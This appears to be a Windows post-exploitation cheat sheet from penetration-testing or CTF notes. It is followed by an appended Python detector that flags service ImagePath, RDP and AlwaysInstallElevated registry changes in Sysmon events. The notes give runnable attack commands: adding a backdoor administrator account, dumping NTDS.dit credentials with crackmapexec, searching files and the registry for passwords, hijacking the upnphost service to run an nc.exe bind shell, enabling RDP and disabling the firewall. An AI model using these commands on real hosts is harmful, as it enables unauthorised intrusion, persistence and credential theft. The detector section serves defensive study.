Windows Post Exploitation

What to do once you have either a standard user or SYSTEM on a Windows host. These notes help with privilege escalation where needed, but mainly with gathering and enumerating as much information about the machine as possible!

windows-privesc-check2.exe --audit -a -o report.txt

net user sp00ks sp00ks /add
net localgroup administrators sp00ks /add 
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

systeminfo - Check for hotfixes installed?

NTDS.dit dump using Crackmapexec
cme smb -u USERNAME -p 'PASSWORD' -d 'DOMAIN' --ntds --exec-method smbexec

findstr /s /n /i /p /c:"password" *.txt
netsh firewall show state

schtasks /query /fo LIST /v

tasklist /SVC


wmic qfe get Caption,Description,HotFixID,InstalledOn

wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
accesschk.exe -ucqv Spooler
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -ucqv SSDPSRV
accesschk.exe -ucqv upnphost

sc qc upnphost
sc config upnphost binpath= "C:\nc.exe -nv 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost

dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

type %WINDIR%\System32\drivers\etc\hosts
net user
net groups
net accounts /domain
cd C:\ & dir /S "proof.txt"
cd C:\ & dir /S "network-secret.txt"
netstat -pantob TCP
netstat -pantob UDP
start cmd.exe /k notepad.exe
Enable RDP
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
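As an added example (not part of the original notes), a small Python detector from the defender's side: it parses constructed Sysmon Event ID 13 (registry value set) records and flags the three changes the commands above make, a service binpath pointing outside the usual directories, fDenyTSConnections set to 0, and AlwaysInstallElevated set to 1. The flattened log format, the trusted-directory list and the sample records are assumptions made for this example.

```python
import re

# Constructed sample records modelled on Sysmon Event ID 13 (RegistryEvent: value set),
# flattened to one "Key=Value ..." line per event. They are not real captures.
SAMPLE_EVENTS = [
    "EventID=13 TargetObject=HKLM\\System\\CurrentControlSet\\Services\\upnphost\\ImagePath "
    "Details=C:\\nc.exe -nv 9988 -e C:\\WINDOWS\\System32\\cmd.exe",
    "EventID=13 TargetObject=HKLM\\System\\CurrentControlSet\\Services\\Spooler\\ImagePath "
    "Details=C:\\Windows\\System32\\spoolsv.exe",
    "EventID=13 TargetObject=HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections "
    "Details=DWORD (0x00000000)",
    "EventID=13 TargetObject=HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\\AlwaysInstallElevated "
    "Details=DWORD (0x00000001)",
]

# A field value runs until the next " Name=" or the end of the line.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?= \w+=|$)")
# Baseline for where service binaries normally live (a heuristic assumed by this example).
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

def parse_event(line):
    """Turn one flattened event line into a dict of field name -> value."""
    return dict(FIELD_RE.findall(line))

def first_token(image_path):
    # Executable part of a service ImagePath: the quoted path, or the first token.
    image_path = image_path.strip()
    if image_path.startswith('"'):
        return image_path[1:].split('"', 1)[0]
    return image_path.split()[0] if image_path else ""

def check_event(ev):
    """Return the findings for one parsed event; an empty list means nothing matched."""
    findings = []
    if ev.get("EventID") != "13":
        return findings
    target, details = ev.get("TargetObject", ""), ev.get("Details", "")
    tl = target.lower()
    if "\\services\\" in tl and tl.endswith("\\imagepath"):
        # The 'sc config <svc> binpath=' trick shows up as an ImagePath outside trusted dirs.
        if not first_token(details).lower().startswith(TRUSTED_PREFIXES):
            findings.append(f"service ImagePath outside trusted dirs: {target} -> {details}")
    elif tl.endswith("\\terminal server\\fdenytsconnections") and details.endswith("(0x00000000)"):
        findings.append(f"RDP enabled (fDenyTSConnections=0): {target}")
    elif tl.endswith("\\installer\\alwaysinstallelevated") and details.endswith("(0x00000001)"):
        findings.append(f"AlwaysInstallElevated set to 1: {target}")
    return findings

def scan(lines):
    """Run check_event over every event line and collect all findings."""
    return [f for line in lines for f in check_event(parse_event(line))]
```

Running scan(SAMPLE_EVENTS) yields three findings; the Spooler record, whose binary sits under C:\Windows, is left alone.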

Disable/Enable Firewall - Win XP/2003
netsh firewall set opmode mode=DISABLE
netsh firewall set opmode mode=ENABLE

Check the firewall logs, if any exist.

View all listening services
netstat -an |find /i "listening"

OS Name?
OS Version?
System Type?
Scheduled Tasks? (run 'at')
Password Policy? (net accounts /domain)
Hosts file output? (type %WINDIR%\System32\drivers\etc\hosts)
Firewall rules? (netsh advfirewall firewall)
